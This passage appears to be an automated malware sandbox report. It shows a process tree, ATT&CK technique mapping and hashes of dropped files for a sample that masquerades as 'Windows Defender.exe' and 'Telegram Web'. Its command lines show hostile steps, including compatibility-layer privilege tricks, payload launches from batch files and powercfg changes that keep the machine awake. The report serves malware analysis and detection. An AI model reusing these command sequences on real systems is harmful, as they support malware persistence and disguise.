        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Rostic.bat" "
        11⤵
        
        PID:4596
        
        C:\Windows\system32\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe""
        12⤵
        Access Token Manipulation: Create Process with Token
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5540
        
        C:\Users\Admin\AppData\Local\Comms\Vulture.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Vulture.exe"
        11⤵
        Executes dropped EXE
        
        PID:184
        
        C:\Users\Admin\AppData\Local\Comms\Vulture.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Vulture.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5648
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Lenochka.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Lenochka.exe"
        11⤵
        Executes dropped EXE
        
        PID:3096
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Lenochka.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Lenochka.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Dolmatinec.bat" "
        11⤵
        
        PID:1096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:1104
        
        C:\Windows\system32\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Local\Comms\Rem.exe""
        12⤵
        Access Token Manipulation: Create Process with Token
        
        PID:5608
        
        C:\Users\Admin\AppData\Local\Comms\Rem.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Rem.exe"
        13⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5532
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        14⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5904
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        
        PID:1612
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        14⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3176
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        14⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2236
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        14⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Dolmatinec.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4080
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Local\Comms\Rem.exe""
        8⤵
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Comms\Rem.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Rem.exe"
        9⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:556
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5168
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5176
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5184
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5192

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Seporant.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4192

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Telegram Web.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4712

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\PDQ.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:5984
- C:\Users\Admin\AppData\Local\Temp\7zO067D0CA8\Seporant.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO067D0CA8\Seporant.exe"
  2⤵
  - Executes dropped EXE
  PID:1280
- C:\Windows\notepad.exe
  "C:\Windows\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\7zO06731D49\Lemon.bat"
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4548
- C:\Windows\notepad.exe
  "C:\Windows\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\7zO06704779\4343.bat"
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5444
- C:\Windows\notepad.exe
  "C:\Windows\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\7zO06704119\Lopinarca.vbs"
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3548

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4548

C:\ProgramData\Windows Defender.exe
"C:\ProgramData\Windows Defender.exe"
1⤵
PID:868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Comms\Ram.exe

Filesize
7.9MB

MD5
a70d41f782f9f2718e1e6c5c5e52fd36

SHA1
281bf5d61439a8c624bc8ca58a3663ee8d734317

SHA256
5d9652481e901f781e4484cde1686e639124b1ea8dc850000e27edd6b55927f0

SHA512
5c1df09c8ff5e039484a7b0f3cc8f58d9698a778d328cf2e1302dc3cdfa4c6dec9ea1877aed45d1b46229f0f53b5c6fb96973ffdb8b4ccbd34214420110ae11b

Download Submit
C:\Users\Admin\AppData\Local\Comms\Ram.exe

Filesize
7.9MB

MD5
6c72e1e70adfe855160a212f28db5668

SHA1
ce26fbcf2e7164a09b6420ac894e7f7a31b76941

SHA256
86d795e2a042f26083f80e41aa65e060ed0d4ad1889c201f79215d1a845b1214

SHA512
d7bd71762d9344bb9ace28498805ed92b348d66a31cc733e81400196208ad9f70a6983eb98f3df51d3ba4e23fca86aa044714d0fbb7b0a2baffb44cd34bf4e75

Download Submit
C:\Users\Admin\AppData\Local\Comms\Rem.exe

Filesize
5.0MB

MD5
e7338e5fb92cd9d00bd8bd8d60f64c4a

SHA1
950799c9cc7e515261833ced8620da7dc0d3f312

SHA256
2cac1393f611121bcef8abd2f5418e5d25fa16b4f4b81cb1887ae68f86a113fe

SHA512
ee776cbe445da5229a39f337ec462f40bb9cb5675f596e9832ccb990a704d229cd31762a147827801a60194bb10db904b1aa1598edace3ae04f9b29dc68e7aaf

Download Submit
C:\Users\Admin\AppData\Local\Comms\Rem.exe

Filesize
5.0MB

MD5
108d8f7cbd3a56a74b0ff9b8195b5b05

SHA1
ea75fcd2f501b14ea49a6720994fb7ba4d159908

SHA256
0e26025de7dd06e31b406b7cd0019605dcaae4496219d1c1f7aa88fee3bc0b41

SHA512
88d9076d0e9f5ff0dcde3abef77be07530673774dc22ff1600e74daac9f1d8734014013bf4bc3aea9b00e53b68742a5be341e7bfe8b4916a34f854241ee4d0a0

Download Submit
C:\Users\Admin\AppData\Local\Comms\Vulture.exe

Filesize
7.7MB

MD5
5309ed43442da1c17af2c3eba9289d70

SHA1
90f95fc60dd89724508659c8e0d54e6ff9d5fb58

SHA256
6e63df7b9efceb8494a45f450895e394fbb61a15d3d451daea73c1b6cd3e61f3

SHA512
5dc59528a435f5f72dffa85fe203783e44277dc43a9d759fd582237e600b1baab2ef03a6461a98eff7a21dc2206c1de74c49bf062c218800aa557332e1e930db

Download Submit
C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe

Filesize
258KB

MD5
bc5fb0b7359df1f06ebd854b70542633

SHA1
02e7d18b7a200df222d63776a230456bbb4b8adc

SHA256
685cbd91485e806aa19a29ae54cbdac7e38ee21b6cde4660cc36eb4f25fdbca4

SHA512
93053b1fa959b14ecb421d4eba8b8a78248dcac0dae5522bd67352335aae87d9b5ed1822b2f77e5e946eb8ef99e63132bcc21ec5dfb4477ac3e5c5de4fbd34e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\4343.bat

Filesize
44B

MD5
6dab9e3a73776385ec91c4ae64b6dd3c

SHA1
82e1007088b2c3ca865a1480b652141d74178640

SHA256
f241135cf5db5013ec8ba065c19867ce5a788960f6f77a05d2f840f1baae76be

SHA512
643f4b5b26c4cd722197f8614ba13d57dedc68e377c1f31241a49469290cd952bb4af5f8762d3db7d0563af08cfe7513524cf20e5d76b36f6273599f8c94dbc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Comms.exe

Filesize
19.8MB

MD5
51882521edc9fea46457a9ea8cdc27d2

SHA1
8ac6f962eac1771a51ae7ca7c22924ed44d2d023

SHA256
a329cb109830253e2a748db6b850971e18938e3bd4a058cddc97307f8a786bd3

SHA512
43058c6869a70d49fd01c09e82abd7597bafc0a9f38336029181a0c7d572fa4b592c5131e8923ccccc1181baeb71f1c27377e46b7f08d9b4cd1c25952123a540

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lemon.bat

Filesize
359B

MD5
46fd8b24f022ba5fbf45f4785caead53

SHA1
b17bfefffe74200e0c8cc674b42409981d9469d8

SHA256
116276c04cbfd8752072a120d1bed967cd65219211db8d4126b9c806f0d24364

SHA512
213b0469ae3e2393fb2b05f7321fd56b7f1ab7929807acdb51fef5ac89087e0885247881ae4d1f24a6f7687bd5a510d0c0d8017f67d78644472fa47ecc75d7cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lopinarca.vbs

Filesize
340B

MD5
16216ab9dc09621fafd33c0973ebf8b6

SHA1
03dc5a2ed233ffc1c1a43c3f1561f99a019a2fb4

SHA256
ff5207fa69dafb6990b2fae2e8210c033ed2035cc77448e1c586141b6eb687e7

SHA512
f6ae2c1344d87a8df318da321bbb01a070e66315a6f66e5e0c1bcee3e1aa188bd0796adb99bf9909c00f0d9689cbf7828dfdede68b379b1db08d2eb412bb1caf

Download Submit
C:\Users\Admin\AppData\Local\Temp\TEMP.exe

Filesize
402KB

MD5
aefe3556f263961ada70bd3e38614af1

SHA1
56ba05c3f144d31731c5e5188ac64c6363d33a16

SHA256
26d668341eba7b05d58aabc1231d8e608600819656d7dbe9380f02c40842f5c5

SHA512
777f5d343321b94efd556aa1b00b0cc2cce02092f1931db1447488d8cd0eb16b5e047c3e781af3ab209df37e5d6b3ef6fa6751d85a84c24ed974f95ed5477f1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp.exe

Filesize
258KB

MD5
a984e32ae7c74a7cb6fa3cd4f5902bf1

SHA1
dc19aa17f9b2bbd0124fda9a15e61b05ca600af8

SHA256
2e0db11592b6149dc7e163a5f472775c709827b7ecd1d5cbe68a2425d2bec2e1

SHA512
b6fe5d727cce5c6f212c885d1f6b90631461f7ea3ec047ad9ef8a532d8b024fe1122b9646c9ec06b853bd55c11176256e000c0af88a85fa45b66e1f4065a4ebe

Download Submit
C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp\Guillotine.bat

Filesize
433B

MD5
aa64b5f9904ca015049e2168eb792f1d

SHA1
8d0dea9bbf925b0a8d72125f7fd10cf95cebd2bd

SHA256
d41942852a27bd0bec858d2c0226aba5100c71735aab2a9de1403c4eca142efc

SHA512
c0897d47352f2c330649cf154e531e5fbf1f3d872802ace695a41a5a5d7cc3f5565bb5ee118df926c0668d6d03a096da2000996a3ede3f74379e8b6f9eb38444

Download Submit
C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp\Melan.vbs

Filesize
168B

MD5
bf85b99e4d6f7ec4a08fe564f67f8cd3

SHA1
c96bb86189bfecffdc05b0b7c903a4b469d0bded

SHA256
9957e23cbf75e2ebaa13df5cb60c67d0d2eb36a3f67850efaa316ecb11285500

SHA512
a3827417b90d9f0575832031cdcdd2f0588ab00774ca5f8b2760fa1e53b8e1819e6931a7c6afcf71d993cd919aa2dce4b939d16fecf7d6f61303872675ac58a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp\Pela.vbs

Filesize
184B

MD5
bc879982509df6831324993ff277b160

SHA1
cad82ac8b071733bcda7fa9b62a34ccd9b7d5db6

SHA256
cf7a6090c7b3f362c920198dcc2d14859c73e39de403c49658486a519fbb68f6

SHA512
22f49c72a402a132b24a340bc6a8ba282d7f354cd6cb67c7baa9cd2d75398d81dcc688f8bc0625cbb9ecc74a7ac10102016c5e5581033c53c852347bbfee6580

Download Submit
C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp\mdkd.bat

Filesize
279B

MD5
32a345f5111cf368c5206d8753dd105d

SHA1
a757a40c784726ce37b71573600ee9b6fa580c73

SHA256
ec9cf2c97e14d5072c4526b8726e517bd06c620bff294cdf5ddd489dd81a8ad8

SHA512
1fc027fe72285e5c773a3a0fdb2521e13337c1e5caab7e5d84eb50ff8264a92f6e7efdb6f4dd1188fd521ea7c606286fd7ecf9b25e0d4e63eb3027650df62266

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\_bz2.pyd

Filesize
83KB

MD5
c17dcb7fc227601471a641ec90e6237f

SHA1
c93a8c2430e844f40f1d9c880aa74612409ffbb9

SHA256
55894b2b98d01f37b9a8cf4daf926d0161ff23c2fb31c56f9dbbac3a61932712

SHA512
38851cbd234a51394673a7514110eb43037b4e19d2a6fb79471cc7d01dbcf2695e70df4ba2727c69f1fed56fc7980e3ca37fddff73cc3294a2ea44facdeb0fa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\_decimal.pyd

Filesize
274KB

MD5
ad4324e5cc794d626ffccda544a5a833

SHA1
ef925e000383b6cad9361430fc38264540d434a5

SHA256
040f361f63204b55c17a100c260c7ddfadd00866cc055fbd641b83a6747547d5

SHA512
0a002b79418242112600b9246da66a5c04651aecb2e245f0220b2544d7b7df67a20139f45ddf2d4e7759ce8cc3d6b4be7f98b0a221c756449eb1b6d7af602325

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\_hashlib.pyd

Filesize
63KB

MD5
422e214ca76421e794b99f99a374b077

SHA1
58b24448ab889948303cdefe28a7c697687b7ebc

SHA256
78223aef72777efc93c739f5308a3fc5de28b7d10e6975b8947552a62592772b

SHA512
03fcccc5a300cc029bef06c601915fa38604d955995b127b5b121cb55fb81752a8a1eec4b1b263ba12c51538080335dabaef9e2b8259b4bf02af84a680552fa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\_lzma.pyd

Filesize
155KB

MD5
66a9028efd1bb12047dafce391fd6198

SHA1
e0b61ce28ea940f1f0d5247d40abe61ae2b91293

SHA256
e44dea262a24df69fd9b50b08d09ae6f8b051137ce0834640c977091a6f9fca8

SHA512
3c2a4e2539933cbeb1d0b3c8ef14f0563675fd53b6ef487c7a5371dfe2ee1932255f91db598a61aaadacd8dc2fe2486a91f586542c52dfc054b22ad843831d1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\_socket.pyd

Filesize
82KB

MD5
abf998769f3cba685e90fa06e0ec8326

SHA1
daa66047cf22b6be608127f8824e59b30c9026bf

SHA256
62d0493ced6ca33e2fd8141649dd9889c23b2e9afc5fdf56edb4f888c88fb823

SHA512
08c6b3573c596a15accf4936533567415198a0daab5b6e9824b820fd1f078233bbc3791fde6971489e70155f7c33c1242b0b0a3a17fe2ec95b9fadae555ed483

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
21KB

MD5
e783c4599529d988e6dd51f602a3852e

SHA1
fe074c132aee81b30b935d82af7dd266ec657cf8

SHA256
cfce9bfbe11b534e1fc28d59efed233b7490f081380a016b45b2357b4be1f173

SHA512
e2b3b7db56f52ecb7579fda1bc267530c257c4d3e0ca0fcfe1ad1192568b1f8c0b91b50b69824403d61c00838db88ca8740a470d82127c4d1ce3f0af370926b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-fibers-l1-1-0.dll

Filesize
21KB

MD5
28d448a71ef395a4a6c218986a001b97

SHA1
ca88e3c54a6525e8adb64263f53bc5ce280dea98

SHA256
7d02b9f60a652ee3496d809fb42a5779d6523aa9e574a853d9d71ca13aa0344d

SHA512
ace4ac658cf7deb526835c2c058f5255217613c11d06eedd8c17e6137741e480a874b1f524de576d6d00b1bf14188604e4842e07fef5c17843db784df042cc7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-file-l1-1-0.dll

Filesize
25KB

MD5
68a9e2900942d86001e56fc7ff0be7e1

SHA1
8c8169ca5d85f0dbaad0b0ab580751b82ceac697

SHA256
2ff6914e5887b3fa53cb418b5602c84b79f189e441e1e66bf42c759688d8c885

SHA512
a512519b58fb227bdb27ca7bdacdc3a3cd740833725db06d19b5a3173a7cfc2e7adbe3089b0643815f741223fe25c31322c4cf20c689b615cddd55c77faf99d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
a855f5ffc6690c1bd1706d1dae6251a2

SHA1
075f84148285a2b61808d3094c8e1fe35466d59f

SHA256
98b4b6a29374e68a383bd6e4b58cd76223335d38d2586c5a494466444811b75c

SHA512
35ee703d27e15e192a847f86c22ad613880e1e53296a1bc0ae2249b2a777a0bfe3695fd609278281e8b3e5621534a242c3d3a7bda48c7ab23e513b59ceeb889d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-file-l2-1-0.dll

Filesize
21KB

MD5
18a078bf6941f50fc3158b749441b9ce

SHA1
279e944990b2fb184a6d09e3e62f574751e2e9a7

SHA256
637e9a34044c366b9b004e62ee15aa4875e344a5a6b7634c803a40d95883d7cc

SHA512
bc45590aaa25264e2c9640f5a9a357d6b0cf88e9027fcf70fcad666a50cc309378ce9a49e0d02cdf299b2631b724e863e31061090d6ae7893db048afa6fb6943

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-handle-l1-1-0.dll

Filesize
21KB

MD5
22c40155ed832a8fe858479e40bb368b

SHA1
7ac524609f61346080ffa912dc40e689d0c2fad4

SHA256
049a1b6b3fd664e5ab2bb27fc3614d8f8091a0dabd4aebc92a0804bf62a55c38

SHA512
82aa8459d7cc47c3d2bbaaffed61a7cfaca30d9a75c4daf688b3795178bcf6258b324c8b71d6f887d5dbe571ce2c73e6a4891a8964e7e1d96fecdf986ed80af0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-heap-l1-1-0.dll

Filesize
21KB

MD5
296c039ebbc1f4ba4700356789f8b23b

SHA1
25e07840d35aa37cd9b001f565e53c6e136cc02f

SHA256
0d5db713081a8c823506739716ff483f6b68e203128b54ea3b807f9aa6fa7f49

SHA512
e2db64f95d4baa0474fb4422bcea990f8fed3a1acfae0f75ae45e165f9ba19c3ccefa7d10091dbc06facf4cc5c11cd8afb1059e36a91015286271466066265e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
21KB

MD5
e95347fd6fb9c65f32edf729e47bc5b9

SHA1
e88d0def4691b3efcdf9aa16f34cfcfa644df8ac

SHA256
73170ecc212462678605e0025d87dfad646e53edbf7c015857cfdd47dfa1138f

SHA512
b4fcc7c7d97d8ad0e4cc9d9b5460989959d471891d3cb2311f356231e71d3384a356c729f9c9e5935a08aa8e551a69a0cee36efc528c211951079dcb42c9cdb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
21KB

MD5
65f21f421f27f7bc5a53daadfe07de3b

SHA1
8749b95bcc2b598093fb26b0cef6382c17cbbe4a

SHA256
f6445229c496e05b84092b4ae5ad765233471acdcd12460b492d499001d623bf

SHA512
b9736bc37d6a9bd591b1c001dd37cc305cc7540879906f37123389898b4f29cc5e2758b17ea5398fb685e5ce7cadd8ec86333167358a8f9ee7a405fa75bbd46e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
8a52d5f941f257c581e856811586b887

SHA1
a510353c67126ec00d13a3f4c0b2e494394a2949

SHA256
6ce59c2de64b6195695e8754636cbe283a7af3ddb78acf32c3879d7d09aba4b1

SHA512
39bad27e61d9a694740556c8290739780ebd7cfdd1f909b85a37ef5c55bc3bd8f439cb6e26d77715649bb04ae701a02fc789535f0d23a5db9ca4a981a38fcb8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-memory-l1-1-0.dll

Filesize
21KB

MD5
b9e7b025cdaa8901f3b0dd06b8e08853

SHA1
1fbff353bfce19a72d496469559fc86773cd415d

SHA256
0b1793130550ea2e80c52cd5c28442f29364cddb063833d67b3c6d5995fd89dd

SHA512
06fe1462e1f8b1dbd9da3f23d1b197b5b01bee14a6ca700eae1b5ca094827f1dbd4f1b5b7c2a1cd13d4f2a5bb749ea5a3b8f49209dde459f56501ba886cd2ad9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
21KB

MD5
177c5821140b07732dcba255ca20c77a

SHA1
039d7dfb7ad901741840aff3f26a21b0947e5a09

SHA256
218d0b5a06fb1c07249bb7388b8ff9c5d7622206c562ffc9fee21a372d1371af

SHA512
47e55706149baad6fa10be1f46c400a304b9f4fe95c2f1eb6e1fd59c4bbe1b1d46bc000a35beac9a28db588e4e6968f770cfc71c88b1c3f618deb4b4d657cc6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
21KB

MD5
704e2314ac6e314acc28d5befb0bc7cb

SHA1
5b74961291656116259966853e79a3f2624150c4

SHA256
11dc3f718b8cd959c30d7c69af2880f728ab5640c678af7290acd554911bc9b0

SHA512
98545518b4b9e1ca5642bdbb89f652c7d002a3e61c8721c6e49d39e7b886aa67968768ca316b70166366c8920503270629b830efa119b3edcfd053dfbc405cb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
21KB

MD5
cd215cfca95bb0885a637a106674df02

SHA1
029fcb8bc4b1e7a0c4c8d328bfb57abc5252bf8e

SHA256
49172aa2c8734ef8159bc6dd58a9ddf9d391f3a109254a96f48fc0d9f9eec89a

SHA512
ccf245bc6edff2a4d7aec94d9a490a370258095469b38ac51b09b4c9ca6570d6dd9070439d9719297f5edf2c15fa5830c5f0ba89b2267a6e6ada927a7cb6d7e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
cb6102cdcd530e82f9a7f2579dd5be22

SHA1
8f1881ba356c8d7497580fc5efe2681200632cae

SHA256
f5c82a141bdc7929bb3d6d4196c0e8501f4a894fd65a435f8134c073134461ac

SHA512
bc9129d58c05991f4567d2ce64e5d5a5ecaa876503ee0644ac61b67fea4b794251cd0f1d1631ef63e8f530a0db074684cde9f35d852ddcb50a9b02d641a63d59

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-profile-l1-1-0.dll

Filesize
21KB

MD5
95dd2837ab03e4ac6df6556d600867ea

SHA1
fb6bac628a794bffcfb2752048781edede095755

SHA256
d71ca70fcf6871ef83f8b45218edc50a2a1ee9d568b77bb69bd56fcf3ebda97b

SHA512
3879de168e6c0ed7a9b814d969d9e409f3b9973172ef5e0d98e1626c79a21d0acff3f61d550f1be4b7a746bd358cb1fab1b108394ea84c1777917e394c345cd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
21KB

MD5
0c2522cdd1a6d898acba478ec646e6ce

SHA1
9f1273dda066cdcdd58f62e12da0ebd48d0648c5

SHA256
e400bf8019dc0caf98865aea07429f8581ac5b004b9759a1c62f2d7bccbcb3a4

SHA512
ee98aa44a575e61097fa67b892314e0dc0aecdc7b15a7e4fb2546ad85faebc2fb1ff063647df9e770adc006b47f0f5edf8f907fa94306ba03e6e44b85883ef34

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-string-l1-1-0.dll

Filesize
21KB

MD5
0013a4840e882642151622e0edbc87b3

SHA1
5fc16ecd9c0648d0df57993606e8388fcb1d9072

SHA256
3e35afeb848c4777e3db2b3b38b2cd8fe768feac82b18c69308fe07d65b1a602

SHA512
3136a9a8dc30f3069f77fb74e84ee548fb71dc01b0ca6d1c65950782ae91d52c50cb13a04d21cbec3275596dd05341a2b475abbf9cfae6f2f34dcfe9eeb28b44

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-synch-l1-1-0.dll

Filesize
21KB

MD5
2223d56816451aa18de3518409d9c835

SHA1
747f3a5201f34b7aff2ae84ec159fdd0fcfb94da

SHA256
f09a3b2d04c4ae6c1217ed073421c912eb7e0fb006441291948470e6329a4fd2

SHA512
72314c20d34c9dcd4736912ddbd89e710ad7a69a14eef2197faa7c3eaaf39c3e467005cf4ddd88d15d02e1fa81cf218a5f48eb7b995592f3adc222d52a2970a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-synch-l1-2-0.dll

Filesize
21KB

MD5
fee1a97d282bee6e34a5634e6ae71699

SHA1
bd5bcff531df9a70f838bc8d9e84661569015da8

SHA256
5cf8cf2b29a0fb4f3df647ccb1efcae0390e0d57bedfc37200c1577810c3716c

SHA512
6bb3bcad6d8153ccd2803fb2c465d1dcf4778689a9f76ab30edb165bb34dbe995441af3cb04bb985b456b92676ba16caf9ecb3555d17c7051fb57bda9b8439b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-sysinfo-l1-1-0.dll

Filesize
21KB

MD5
b1f1058597973bed224af2c9c0a878fe

SHA1
74754fe3825d1a1523d35279da7e998a476ed8f3

SHA256
b3b356cdca34cb5023cd8f49025e23128f1e86dd0d4865d62bc42f775f1acca8

SHA512
4471b425078058e84705b3be09e6bdbbc4b044543d8374e69685de470ec021b21567786be4cbcd6ffb5fc571fcbd4eedd313588fd3aad0ecfd38026e1e19d057

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
7f0a0a190aea88884088bd09d36a2c4b

SHA1
f8d3039deda1f7fc025f4e4cbbc3010cba3762b3

SHA256
a202f21169cc103c019019d3cbc05c3549a8dbac6eed0ecb4e5281e36f028a26

SHA512
5f75ad8016ee9649cd565e27930f951cfc7b40b468ca7a5792578301ff2a16825ca2a98103ba8f4e6d8feb761655be1d8c24fa9e1d539bec6c3a5b3a04f8e9b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-core-util-l1-1-0.dll

Filesize
21KB

MD5
83251b9d23c1f80ad95165aac4988a41

SHA1
bdf7d476eaa4ba653bbaab69d55cea1b6a1eabe4

SHA256
01cbe35a9513dd5c499179a31dbae86a4f37a510bba7a7cc484f23559b252067

SHA512
1b35745b8a4f49db953f547626c1a1cb271466335bfbd64a32742fea186ff0b1302dc7ce6b333e4d40f42d90a4f92755eb87ec9d728a338153e86f0af2b252f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\api-ms-win-crt-conio-l1-1-0.dll

Filesize
21KB

MD5
